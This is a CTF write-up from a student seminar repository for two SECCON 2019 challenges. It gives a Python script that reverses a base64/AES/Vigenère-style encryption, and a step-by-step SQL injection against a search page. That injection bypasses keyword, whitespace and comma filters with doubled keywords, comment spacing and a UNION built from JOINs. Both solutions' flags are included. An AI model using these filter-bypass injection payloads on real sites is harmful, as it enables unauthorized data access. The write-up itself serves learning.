Update toaster/seccon19 writeup

[pub/jan/ctf-seminar.git] / writeups / toaster / seccon19.md

# SECCON 2019
Unfortunately I didn't have much time on this weekend so I couldn't play many challenges. Also, I was playing on saturday evening, so both of the challenges I solved where already solved by team mates.
I was looking for some (more more less) short and easy challenges and I found two which I will describe in this writeup. I also tried some others (`Option-Cmd-U` and `Beeeeeeeeeer`) but not long enough to be mentioned in this writeup.

All in all I had fun solving the smaller challenges and was happy that there were some easier challenges too. It was very satisfying getting those flags, allthough it wasn't that hard. I also found out some new tricks how to bypass filters against SQL injection.

#### coffee_break
I am usually not into crypto challenges (Still have bad memories about that mitm-crypto challenge of the InetSec course. Just kidding, was a nice challenge @cluosh), however this challenge had many solves in comparison to the others, so I tried my luck.
Turned out that this was quite an easy challenge, as you had the source code of an encryption script, where you could simply do the steps the other way round:

```python
import sys
from Crypto.Cipher import AES
import base64

def decrypt(key, text):
    s = ''
    for i in range(len(text)):
        s += chr((((ord(text[i]) - 0x20) - (ord(key[i % len(key)]) - 0x20)) % (0x7e - 0x20 + 1)) + 0x20)
    return s

key1 = "SECCON"
key2 = "seccon2019"
text = sys.argv[1]

dec1 = base64.b64decode(text)
cipher = AES.new(key2 + chr(0x00) * (16 - (len(key2) % 16)), AES.MODE_ECB)
p = 16 - (len(dec1) % 16)
dec2 = cipher.decrypt(dec1 + chr(p) * p)
print decrypt(key1, dec2)
```

Executed with `python decrypt.py FyRyZNBO2MG6ncd3hEkC/yeYKUseI/CxYoZiIeV2fe/Jmtwx+WbWmU1gtMX9m905` this script gives us the correct flag. (`FyRyZN...` is the encrypted flag given in the challenge description.)
My script only works with python 2 and adds gibberish at the end of the output, but the flag was correct so I didn't correct it.

Flag: `SECCON{Success_Decryption_Yeah_Yeah_SECCON}`


#### web_search
This web page displays some RFCs with the possibility to filter them. You can enter a search term and the page filters the entries accordingly.
When I saw the page for the first time, I tried out the search function. I entered something like "random" because I saw some RFC with the text "randomly". After I pressed "Search", the text in the text field changed to "rom" which was really weird. After a few seconds and with the thought that there could be a SQL injection vulnerability, I grasped that the SQL keyword `AND` was removed in my search term. I confirmed that by trying a few other search terms containing the `OR` and `AND` keywords.

Now I tried SQL commands like `'OR '1'='1` but I had to find a way to bypass the removal of SQL keywords. I entered something like `'OORR '1'='1` and somehow the middle `OR` gets removed but then one `OR` is still remaining, so the first step was made.
Second problem I had to solve was that whitespaces are also removed. Luckily I remembered one trick from the IntroSec course, where whitespaces can be replaced with a comment (`/**/`).
Unfortunately, no secret messages or something were shown so I played around with my query a little bit.
I added a comment after it with `#` because `--` led to an error: `'OORR/**/'1'='1'#`

Now I finally got something to see:
```
FLAG
The flag is "SECCON{Yeah_Sqli_Success_" ... well, the rest of flag is in "flag" table. Try more!
```
I then tried some UNION commands. But when I tried to use `'OORR/**/'1'='0'/**/UNION/**/SELECT/**/1,1,1#` I saw that commas are removed. So I had to use a UNION command without commas using JOINS to find out the number of columns:
```sql
'OORR/**/'1'='0'/**/UNION/**/SELECT/**/*FROM/**/(SELECT/**/1)/**/AS/**/a/**/JOIN/**/(SELECT/**/1)/**/AS/**/b/**/JOIN/**/(SELECT/**/1)/**/AS/**/c#`
```
I tried this command with one and two columns before and got errors. When I tried it with three columns the query was successful, so I knew that three specified columns were needed for the query to succeed.
So now I simply tried
```sql
'OORR/**/'1'='0'/**/UNION/**/SELECT/**/*FROM/**/(SELECT/**/*FROM/**/flag)/**/AS/**/a/**/JOIN/**/(SELECT/**/1)/**/AS/**/b/**/JOIN/**/(SELECT/**/1)/**/AS/**/c#`
```
and it succeeded. I got to see this on the bottom of the page:
```
You_Win_Yeah}
1
```
I didn't think this would work as I didn't know the number of columns of the flag table. Apparently it only has one column so my payload works. Otherwise I would have had to get the names of the columns via the `INFORMATION_SCHEMA` table.

Now I can simply concatenate those two pieces of the flag: `SECCON{Yeah_Sqli_Success_You_Win_Yeah}`